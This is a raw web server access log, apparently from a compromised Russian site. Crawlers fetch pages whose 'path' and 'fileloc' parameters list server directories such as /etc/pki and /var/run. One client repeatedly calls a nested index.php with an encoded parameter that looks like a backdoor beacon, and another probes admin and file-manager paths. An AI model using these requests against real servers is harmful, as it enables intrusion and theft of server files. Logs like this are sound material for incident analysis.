216.73.216.53 - - [04/Nov/2025:06:18:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fusr%2Fshare%2Flocale%2Fse HTTP/1.0" 200 14174 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:18:33 +1000] "GET /12245120?shopdetail=0012231527 HTTP/1.0" 200 188174 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:06:18:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Flicenses%2Fgraphite2-1.3.10%2FLICENSE&path=%2F%2Fusr%2Fshare%2Flicenses%2Fgraphite2-1.3.10 HTTP/1.0" 200 39275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:18:37 +1000] "GET /1267632?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:18:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2F1b7 HTTP/1.0" 200 14642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:06:15:49 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343534392p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303934392q3266313834353337336136373166666531366235343032306261633336623461222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:18:42 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F173 HTTP/1.0" 200 14532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F270 HTTP/1.0" 200 14555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:18:46 +1000] "GET /1488416?path=//usr/src HTTP/1.0" 200 15327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:18:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2F7d1 HTTP/1.0" 200 14614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F331 HTTP/1.0" 200 14516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:18:50 +1000] "GET /14191072?shopdetail=0014175185 HTTP/1.0" 200 183522 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.14 - - [04/Nov/2025:06:18:54 +1000] "GET /1154816?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:18:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F031 HTTP/1.0" 200 14615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:18:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F243 HTTP/1.0" 200 14615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:00 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2F7e2 HTTP/1.0" 200 14582 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:06:16:12 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343537322p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303937322q6664393435613563623366323632616236643166353764336233353631356132222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:19:03 +1000] "GET /1347568512?path=%2F HTTP/1.0" 200 39531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.71 - - [04/Nov/2025:06:19:03 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?shopdetail/48131424.html HTTP/1.0" 200 202994 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.14 - - [04/Nov/2025:06:19:03 +1000] "GET /1299776?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:19:09 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F884 HTTP/1.0" 200 14547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F821 HTTP/1.0" 200 14553 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:19:14 +1000] "GET /1031168?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:19:15 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F873 HTTP/1.0" 200 14555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:18 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2Fac1 HTTP/1.0" 200 14615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F335 HTTP/1.0" 200 14556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F832 HTTP/1.0" 200 14484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:19:27 +1000] "GET /1062336?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [04/Nov/2025:06:16:36 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343539362p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230303939362q6130623865366535376131353366643438393635356431616361373361653231222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:19:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2Fb17 HTTP/1.0" 200 14778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fiblock%2F572 HTTP/1.0" 200 14615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:06:19:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Ftemp%2Fyarustone.ru%2Fupload%2Fmedialibrary%2F57e HTTP/1.0" 200 14738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:19:34 +1000] "GET /1533520?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:19:38 +1000] "GET /1156954688?shopdetail=1155591203 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:19:40 +1000] "GET /deportes/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:19:41 +1000] "GET /1156727968?shopdetail=1155364749 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:19:42 +1000] "GET /elections/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
74.7.227.14 - - [04/Nov/2025:06:19:43 +1000] "GET /1120208?path=//var/run HTTP/1.0" 200 74347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:19:44 +1000] "GET /1156788336?shopdetail=1155425046 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:19:43 +1000] "GET /1360509872?shopdetail=1358906346 HTTP/1.0" 200 199114 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.56.163.85 - - [04/Nov/2025:06:19:45 +1000] "GET /dev_grupo_total/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:19:50 +1000] "GET /891891792?shopdetail=0890840880 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:06:16:59 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343631392p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230313031392q3632653263636636366237653734666431633564626662306563343262383163222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
81.56.163.85 - - [04/Nov/2025:06:19:51 +1000] "GET /develop/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
74.7.227.14 - - [04/Nov/2025:06:19:51 +1000] "GET /1190288?path=//etc/dhcp HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:19:53 +1000] "GET /1156925584?shopdetail=1155562132 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:19:52 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-load.php?etc/secondhand.html HTTP/1.0" 200 210753 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
81.56.163.85 - - [04/Nov/2025:06:19:53 +1000] "GET /dev_zarrel/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
54.147.182.90 - - [04/Nov/2025:06:19:55 +1000] "GET /228203712?path=//dev/disk/by-uuid HTTP/1.0" 200 12768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:19:56 +1000] "GET /1156766432?shopdetail=1155403169 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:19:56 +1000] "GET /cmstaskenv/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
114.119.145.237 - - [04/Nov/2025:06:19:56 +1000] "GET /uslugi/perevozka-stroitelnyh-materialov?path=//lib HTTP/1.0" 200 57151 "https://region-logist.ru/uslugi/perevozka-stroitelnyh-materialov?path=/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.56.163.85 - - [04/Nov/2025:06:19:59 +1000] "GET /config/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:19:59 +1000] "GET /891644704?shopdetail=0890594085 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.89.90.224 - - [04/Nov/2025:06:20:00 +1000] "GET /228203712?path=//run/udev/data HTTP/1.0" 200 1461316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.14 - - [04/Nov/2025:06:20:01 +1000] "GET /1461104?path=//etc/yum HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.56.163.85 - - [04/Nov/2025:06:20:01 +1000] "GET /database/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:02 +1000] "GET /1156798224?shopdetail=1155434924 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
23.23.104.107 - - [04/Nov/2025:06:20:03 +1000] "GET /228203712?path=//sys/module/syscopyarea HTTP/1.0" 200 28473 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
81.56.163.85 - - [04/Nov/2025:06:20:03 +1000] "GET /composer-master/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:05 +1000] "GET /891624352?shopdetail=0890573757 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:06:20:04 +1000] "GET /13893632?shopdetail=0013878095 HTTP/1.0" 200 188191 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.56.163.85 - - [04/Nov/2025:06:20:06 +1000] "GET /userfiles/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
74.7.227.14 - - [04/Nov/2025:06:20:07 +1000] "GET /1488416?path=//usr/etc HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:06:20:08 +1000] "GET /891354544?shopdetail=0890304266 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:20:08 +1000] "GET /apps/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
34.205.163.103 - - [04/Nov/2025:06:20:08 +1000] "GET /228203712?path=//sys/class/scsi_host HTTP/1.0" 200 16783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.195.244.119 - - [04/Nov/2025:06:20:08 +1000] "GET /1497718944?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-trackback.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 18551 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
81.56.163.85 - - [04/Nov/2025:06:20:11 +1000] "GET /absen/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:11 +1000] "GET /1156984400?shopdetail=1155620880 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.3.127.170 - - [04/Nov/2025:06:20:12 +1000] "GET /228203712?path=//var/www/parkkompleks_usr HTTP/1.0" 200 12783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
81.56.163.85 - - [04/Nov/2025:06:20:13 +1000] "GET /ebook/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:14 +1000] "GET /1156564480?shopdetail=1155201455 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:20:15 +1000] "GET /elfinder/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
52.4.76.156 - - [04/Nov/2025:06:20:15 +1000] "GET /228203712?path=//usr/share/desktop-directories HTTP/1.0" 200 12795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
212.16.195.25 - - [04/Nov/2025:06:17:22 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323230343634322p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323230313034322q6562363864663937623963363535616533336435646635373065343761383738222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:06:20:17 +1000] "GET /1156441680?shopdetail=1155078800 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:20:17 +1000] "GET /1023328?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.56.163.85 - - [04/Nov/2025:06:20:19 +1000] "GET /db/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:20 +1000] "GET /1156787328?shopdetail=1155424039 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.85.126.86 - - [04/Nov/2025:06:20:21 +1000] "GET /228203712?path=//opt/php82/conf.d HTTP/1.0" 200 41617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
81.56.163.85 - - [04/Nov/2025:06:20:22 +1000] "GET /kumpulan_api/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:23 +1000] "GET /891420320?shopdetail=0890369965 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:06:20:23 +1000] "GET /1505072?path=//var/run HTTP/1.0" 200 74347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.56.163.85 - - [04/Nov/2025:06:20:24 +1000] "GET /filemanager/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
52.45.92.83 - - [04/Nov/2025:06:20:25 +1000] "GET /228203712?path=//opt/php82/Console HTTP/1.0" 200 14218 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:26 +1000] "GET /891611584?shopdetail=0890561003 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:20:27 +1000] "GET /kcfinder/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
216.73.216.53 - - [04/Nov/2025:06:20:29 +1000] "GET /1156680992?shopdetail=1155317829 HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.56.163.85 - - [04/Nov/2025:06:20:29 +1000] "GET /descarga/ HTTP/1.0" 200 62019 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
